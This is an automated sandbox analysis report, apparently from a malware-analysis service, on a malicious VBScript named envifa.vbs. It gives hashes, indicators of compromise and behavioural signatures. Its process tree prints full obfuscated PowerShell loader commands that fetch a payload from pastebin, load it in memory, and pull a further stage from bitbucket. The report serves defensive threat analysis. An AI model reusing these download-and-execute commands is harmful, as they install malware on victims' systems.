Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
26-09-2024 04:53
Static task
static1
Behavioral task
behavioral1
Sample
envifa.vbs
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
envifa.vbs
Resource
win10v2004-20240802-en
General
-
Target
envifa.vbs
-
Size
4.0MB
-
MD5
b9b5d25eb96b7de9629b3344aaca4d71
-
SHA1
e9f07e0dd33c986fc83ddf9e4e702dbb92dbb834
-
SHA256
f81f4cddc306cd06fb2cd456e08cd15e58cc55540fedfd3cc11d62fb74b6cd95
-
SHA512
69c1f2de49adc6d4cbc3f74ca83c8b1bdb882d10efd4d891345432e776e6a40d23fe456d23e8c004bc26a2c49a10baedf3255119e57f8e4481804250cfc614e3
-
SSDEEP
96:D6G7MtM9s/Q8u5QiOK09ALsFckHixZzan9gzdR3s:GSHbO9GsFcCudan9mhs
Malware Config
Extracted
http://pastebin.com/raw/V9y5Q5vv
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 5 2664 powershell.exe 6 2664 powershell.exe 8 2664 powershell.exe 9 2664 powershell.exe -
pid Process 2752 powershell.exe 2664 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 4 pastebin.com 6 pastebin.com 7 bitbucket.org 8 bitbucket.org 9 bitbucket.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2752 powershell.exe 2664 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2752 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1792 wrote to memory of 2752 1792 WScript.exe 30 PID 1792 wrote to memory of 2752 1792 WScript.exe 30 PID 1792 wrote to memory of 2752 1792 WScript.exe 30 PID 2752 wrote to memory of 2664 2752 powershell.exe 32 PID 2752 wrote to memory of 2664 2752 powershell.exe 32 PID 2752 wrote to memory of 2664 2752 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bm☆HY☆e☆Bm☆GU☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆Hk☆egB5☆HE☆cg☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBy☆HY☆ZQBy☆EM☆ZQBy☆HQ☆aQBm☆Gk☆YwBh☆HQ☆ZQBW☆GE☆b☆Bp☆GQ☆YQB0☆Gk☆bwBu☆EM☆YQBs☆Gw☆YgBh☆GM☆aw☆g☆D0☆I☆B7☆CQ☆d☆By☆HU☆ZQB9☆Ds☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆HI☆dgBp☆GM☆ZQBQ☆G8☆aQBu☆HQ☆TQBh☆G4☆YQBn☆GU☆cgBd☆Do☆OgBT☆GU☆YwB1☆HI☆aQB0☆Hk☆U☆By☆G8☆d☆Bv☆GM☆bwBs☆C☆☆PQ☆g☆Fs☆UwB5☆HM☆d☆Bl☆G0☆LgBO☆GU☆d☆☆u☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆V☆B5☆H☆☆ZQBd☆Do☆OgBU☆Gw☆cw☆x☆DI☆OwBb☆EI☆eQB0☆GU☆WwBd☆F0☆I☆☆k☆Gk☆agBj☆GM☆cw☆g☆D0☆I☆Bb☆HM☆eQBz☆HQ☆ZQBt☆C4☆QwBv☆G4☆dgBl☆HI☆d☆Bd☆Do☆OgBG☆HI☆bwBt☆EI☆YQBz☆GU☆Ng☆0☆FM☆d☆By☆Gk☆bgBn☆Cg☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆Cc☆a☆B0☆HQ☆c☆☆6☆C8☆LwBw☆GE☆cwB0☆GU☆YgBp☆G4☆LgBj☆G8☆bQ☆v☆HI☆YQB3☆C8☆Vg☆5☆Hk☆NQBR☆DU☆dgB2☆Cc☆KQ☆g☆Ck☆I☆☆p☆Ds☆WwBz☆Hk☆cwB0☆GU☆bQ☆u☆EE☆c☆Bw☆EQ☆bwBt☆GE☆aQBu☆F0☆Og☆6☆EM☆dQBy☆HI☆ZQBu☆HQ☆R☆Bv☆G0☆YQBp☆G4☆LgBM☆G8☆YQBk☆Cg☆J☆Bp☆Go☆YwBj☆HM☆KQ☆u☆Ec☆ZQB0☆FQ☆eQBw☆GU☆K☆☆n☆FQ☆ZQBo☆HU☆b☆Bj☆Gg☆ZQBz☆Fg☆e☆BY☆Hg☆e☆☆u☆EM☆b☆Bh☆HM☆cw☆x☆Cc☆KQ☆u☆Ec☆ZQB0☆E0☆ZQB0☆Gg☆bwBk☆Cg☆JwBN☆HM☆cQBC☆Ek☆YgBZ☆Cc☆KQ☆u☆Ek☆bgB2☆G8☆awBl☆Cg☆J☆Bu☆HU☆b☆Bs☆Cw☆I☆Bb☆G8☆YgBq☆GU☆YwB0☆Fs☆XQBd☆C☆☆K☆☆n☆HQ☆e☆B0☆C4☆RQBS☆EI☆VQBU☆EM☆TwBS☆EU☆TgBF☆FQ☆UwBP☆FM☆LwBz☆GQ☆YQBv☆Gw☆bgB3☆G8☆Z☆☆v☆G8☆d☆Bz☆G8☆ZwBh☆C8☆cwBz☆G8☆aQB2☆G4☆ZQ☆v☆Gc☆cgBv☆C4☆d☆Bl☆Gs☆YwB1☆GI☆d☆Bp☆GI☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆B5☆Ho☆eQBx☆HI☆I☆☆s☆C☆☆JwBf☆F8☆XwBf☆F8☆XwBf☆GE☆UwBE☆EY☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆Xw☆t☆C0☆LQ☆t☆C0☆LQ☆t☆Cc☆L☆☆g☆CQ☆ZgB2☆Hg☆ZgBl☆Cw☆I☆☆n☆DE☆Jw☆s☆C☆☆JwBS☆G8☆Z☆Bh☆Cc☆I☆☆p☆Ck☆Ow☆=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\envifa.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$fvxfe = '0';$yzyqr = 'C:\Users\Admin\AppData\Local\Temp\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $ijccs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($ijccs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('txt.ERBUTCORENETSOS/sdaolnwod/otsoga/ssoivne/gro.tekcubtib//:sptth' , $yzyqr , '_______aSDF_____________________________________-------', $fvxfe, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53479017082d3ba6ffcbdbd24fd8fb903
SHA1e250aebf2b2d7bc454734806510c73b7acb797c3
SHA256fddcfc9849d9f8e602c6c0f15b48e167620ef5c2630e51dbde6f1a0ed7347d62
SHA5127d6d6832dd8fddcd6a86fa710fc6fb441f62418d270ae371b9fdf816d1c0e6c0db5f32cc72096310053b2a4a80323e38a237ce2516bd3d82610a64cf22bc3f54